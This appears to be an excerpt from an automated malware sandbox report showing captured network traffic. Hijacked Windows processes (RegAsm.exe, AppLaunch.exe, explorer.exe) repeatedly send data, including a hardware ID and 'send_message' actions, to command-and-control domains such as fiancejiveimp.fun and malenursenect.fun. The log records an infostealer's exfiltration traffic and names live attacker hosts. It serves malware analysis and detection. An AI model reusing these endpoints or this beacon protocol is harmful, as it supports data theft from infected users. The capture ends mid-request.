                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:02.562010050 CEST4920INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:02 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=4c1cl6gv21f5soqbbn5vgo20ej; expires=Sat, 27 Jan 2024 09:49:41 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:02 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=abEflWoaWiNyG5BFpHmlDM2SKpCCkHp1CxTakAMiA9OspB3lIGTXbBXtlXYIBSCFai833BWagEjCKjkkJJjJUYcToNwk79dL7MTOUFRqp7YEH2E6uqR9thSl0XWzuGh5IC4X1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669b2dc3b827b-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:02.562122107 CEST4920INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        66192.168.2.349887172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:04.791336060 CEST4921OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:04.791851997 CEST4921OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:05.207709074 CEST4923INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:05 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=21h7p6ht5kv5j7ovg1til8upip; expires=Sat, 27 Jan 2024 09:49:44 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:05 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=69jtijKlM%2FoK5D%2BiDXz8DUqW8bufzDj9gtPIJqTUk7kSOnnZYlVbZrruGt8edr0eBnwRdSENl63lWvDCbCQ1b6sLCQBGCk5FQ9gKR1%2Bn7bJFWhQBgB7xITlNQb9vqxUbNk%2BBxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669c32b2d05f3-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:05.207732916 CEST4923INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        67192.168.2.349888172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:05.443566084 CEST4923OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:05.443912983 CEST4924OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:05.678751945 CEST4925INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:05 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=mi51030m8710m2739qua6ri49t; expires=Sat, 27 Jan 2024 09:49:44 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:05 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gwN22VROz%2BcheOkU7iC%2FYkMkYXRXaV%2FVw30WIIDxf2zx5RxAshnz%2FSyvg%2FOxMQzUZcBDmHJMyvYU4Vku8MJVhqYLnzLCJBfFsTiN1tNlvsbswLM%2BK%2FSYU1Jb%2Bb4D1slN%2B6hsMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669c73f4c07f9-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:05.678770065 CEST4925INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        68192.168.2.349889172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:05.906244040 CEST4927OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:05.906907082 CEST4928OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:06.234484911 CEST4930INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:06 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=dodq693bjj2o0va2kheb7v10r5; expires=Sat, 27 Jan 2024 09:49:45 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:06 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4hTJoy%2FJJRXdQylwMczzF1NVeChWv9YKG5TrUhqQH99ozBmhcM3R99wkN%2BkOuovAXVFSfC9g9wpMFiRJwEHXLALVIw%2BA3DosTwC%2ByEHvmwb8aIYJyo7JMY4ica5iwiln81Ongg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669ca2dde5b2e-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:06.234500885 CEST4930INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        69192.168.2.349890104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:06.002593994 CEST4929OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:06.003201962 CEST4929OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:06.299102068 CEST4932INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:06 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=dhqj2e05eeeg2t1qk0a2f4vdde; expires=Sat, 27 Jan 2024 09:49:45 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:06 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a4qAiuBKT9D83WvX8mAph4RRrUdgr%2FQzcHrTMcsa0eGZLmonZip218NTyHQtI%2BFf1gAcThV7FrlfyNVtlgHdYJMLY%2FSMr6OoYtVAE9PVzfZ802JYdkzaIACHkhkJnzNiicOhsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669cabce607bb-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:06.299130917 CEST4932INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.349823211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:29.657171965 CEST316OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://wqhjt.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 328
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:29.657202005 CEST317OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3f 15 c9 bd
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu?4ZORl[O4rthEOUMsh4z9%_%PFB}==qJC7HI4veIE'j;_$0./
                                                                                                        Oct 3, 2023 18:02:30.749039888 CEST317INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:30 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        70192.168.2.349891172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:06.445035934 CEST4933OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:06.445869923 CEST4933OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:06.780127048 CEST4936INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:06 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=a0mvpbcgd4et09a36iighb7mgh; expires=Sat, 27 Jan 2024 09:49:45 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:06 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eJF7Nb%2F%2Bvww73BeG%2FAVC3DzSyCbjCLSA52m9INfGSUOLVYOBscoewm5erVdzWVAjIdXz14bqx2SB7f4uRB7sX%2BBKEte5k4aM0h8FlsjmroX8EZ9H0ljYfXCLe%2FBhoObydn1U%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669cd896c39b0-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:06.780144930 CEST4936INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        71192.168.2.349892172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:06.540004969 CEST4934OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:06.540410042 CEST4934OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:06.904748917 CEST4937INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:06 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=thmrceuln7haepmatjg2qfiquq; expires=Sat, 27 Jan 2024 09:49:45 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:06 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7K10tHZvPecziFgWWxL1pT7qIVeEe5V6pgHT%2FHAcf5jaQjaW2kCfGgEesmpRofetJ%2BHddZr4uAYlTm2L1SqCftAneJwXbv%2BhR4oMJfjSw9DNxlJukC9pReM8f1o9rtLm%2B5q2Og%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669ce1ef081ac-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:06.904759884 CEST4937INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        72192.168.2.349893172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:06.996273041 CEST4938OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:06.996638060 CEST4938OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:07.452788115 CEST4941INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:07 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=505c0gnqflevjanm6absque6nc; expires=Sat, 27 Jan 2024 09:49:46 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:07 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3mo7NFoDmsJNNN%2BRQZMpw5qtd%2ForzMzz5Dj9tMrjVRjvFzdHW2VQ2e79AzVt9sxdtObhyGFn%2BaIW5A1BEGTN65Cu%2F%2B7O%2FTYZn4rX2rJ4LW3b4bkHqnSOHuXjJtPKj%2B7lOgLjrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669d0fd8c3b32-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:07.452806950 CEST4941INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        73192.168.2.349894104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:07.129483938 CEST4939OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:07.129920959 CEST4940OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
